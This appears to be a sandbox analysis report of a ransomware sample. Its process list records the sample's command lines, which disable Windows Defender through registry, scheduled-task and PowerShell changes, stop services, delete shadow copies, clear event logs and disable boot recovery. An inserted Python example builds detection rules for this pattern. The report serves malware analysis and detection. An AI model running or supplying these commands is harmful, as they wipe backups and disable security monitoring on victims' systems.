ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\notepad.exe | N/A

Runs net.exe

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A
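Taken together, the signatures above (MpCmdRun.exe removing Defender definitions, reg.exe setting the WinDefend service's Start value to 4, which is SERVICE_DISABLED, wevtutil.exe clearing event logs, vssadmin.exe/wmic.exe touching shadow copies, bcdedit.exe changing boot configuration, and net.exe/sc.exe stopping services) are the pre-encryption "impair defenses and inhibit recovery" burst that makes this family detectable from process-creation telemetry before files are renamed. The report records only the spawned images (no command lines except the reg value), so the following added example, which is not part of the report, uses constructed Sysmon-style events with command lines that are typical for these tools; PIDs 1968, 576, 528 and 1836 are taken from the WriteProcessMemory rows below, the other PIDs are invented, and the ATT&CK technique mapping is this example's own. It matches each event against per-tool rules, walks hits up through relay binaries (net.exe spawns net1.exe) to the process that issued them, and flags a parent only when several distinct categories fire, so a lone administrative vssadmin call does not alert.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as a Sysmon EID 1 / Security 4688 record carries it
    cmdline: str


# Detection rules: (category, ATT&CK technique, image regex, command-line regex), case-insensitive.
# The technique mapping is this example's own; the report's ATT&CK section is empty.
RULES: List[Tuple[str, str, str, str]] = [
    ("defender_service_disabled", "T1562.001", r"\\reg\.exe$",
     r"services\\WinDefend\b.*\s/v\s+Start\b.*\s/d\s+4\b"),          # Start=4 is SERVICE_DISABLED
    ("defender_definitions_removed", "T1562.001", r"\\MpCmdRun\.exe$", r"-RemoveDefinitions\b"),
    ("shadow_copies_deleted", "T1490", r"\\vssadmin\.exe$", r"\bdelete\s+shadows\b"),
    ("shadow_copies_deleted", "T1490", r"\\wmic\.exe$", r"\bshadowcopy\s+delete\b"),
    ("event_logs_cleared", "T1070.001", r"\\wevtutil\.exe$", r"(^|\s)(cl|clear-log)\s+\S+"),
    ("recovery_boot_disabled", "T1490", r"\\bcdedit\.exe$",
     r"\brecoveryenabled\s+no\b|\bbootstatuspolicy\s+ignoreallfailures\b"),
    ("service_stopped", "T1489", r"\\net1?\.exe$", r"\bstop\s+\S+"),
    ("service_stopped", "T1489", r"\\sc\.exe$",
     r"\bconfig\s+\S+\s+start=\s*disabled\b|\bstop\s+\S+"),
]
_COMPILED = [(c, t, re.compile(i, re.I), re.compile(p, re.I)) for c, t, i, p in RULES]

# Relay binaries that only forward a command (net.exe -> net1.exe, cmd.exe /c ...); hits are
# attributed to the nearest ancestor that is not one of these.
_RELAY = re.compile(r"\\(net|net1|cmd)\.exe$", re.I)


def match_event(ev: ProcEvent) -> List[Tuple[str, str]]:
    """Return (category, technique) for every rule the event satisfies."""
    return [(c, t) for c, t, img, cmd in _COMPILED
            if img.search(ev.image) and cmd.search(ev.cmdline)]


def attribute(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> int:
    """PID of the process that actually issued the command, skipping relay binaries."""
    cur = ev
    while cur.ppid in by_pid and _RELAY.search(by_pid[cur.ppid].image):
        cur = by_pid[cur.ppid]
    return cur.ppid


def correlate(events: List[ProcEvent], min_categories: int = 3) -> Dict[int, Set[str]]:
    """Group hits by originating parent and keep parents with >= min_categories distinct
    categories: one category is admin noise, four or more is the ransomware pre-flight."""
    by_pid = {e.pid: e for e in events}
    cats: Dict[int, Set[str]] = defaultdict(set)
    for ev in events:
        hits = match_event(ev)
        if hits:
            cats[attribute(ev, by_pid)].update(c for c, _ in hits)
    return {p: s for p, s in cats.items() if len(s) >= min_categories}


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"
SYS32 = r"C:\Windows\system32"

# Constructed events (assumption): PIDs 1968/576/528/1836 come from this report's process
# tree; the command lines are typical for these tools and were not recorded by the sandbox.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1968, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(576, 1968, SYS32 + r"\net.exe", "net stop vss /y"),
    ProcEvent(528, 576, SYS32 + r"\net1.exe", r"C:\Windows\system32\net1 stop vss /y"),
    ProcEvent(1836, 1968, SYS32 + r"\sc.exe", "sc config vss start= disabled"),
    ProcEvent(1300, 1968, SYS32 + r"\reg.exe",
              r"reg add HKLM\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f"),
    ProcEvent(1304, 1968, r"C:\Program Files\Windows Defender\MpCmdRun.exe",
              r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcEvent(1308, 1968, SYS32 + r"\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(1312, 1968, r"C:\Windows\System32\Wbem\wmic.exe", "wmic shadowcopy delete"),
    ProcEvent(1316, 1968, SYS32 + r"\wevtutil.exe", "wevtutil cl security"),
    ProcEvent(1320, 1968, SYS32 + r"\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(1324, 1968, SYS32 + r"\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(1328, 1968, SYS32 + r"\PING.EXE", "ping 127.0.0.1 -n 3"),   # delay loop, no rule fires
]

if __name__ == "__main__":
    for ppid, categories in correlate(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {sorted(categories)}")
```

The per-rule regexes are deliberately narrow (the reg rule requires the WinDefend key, /v Start and /d 4 together) so that routine service configuration does not match; coverage comes from the correlation step, not from loose patterns.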

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

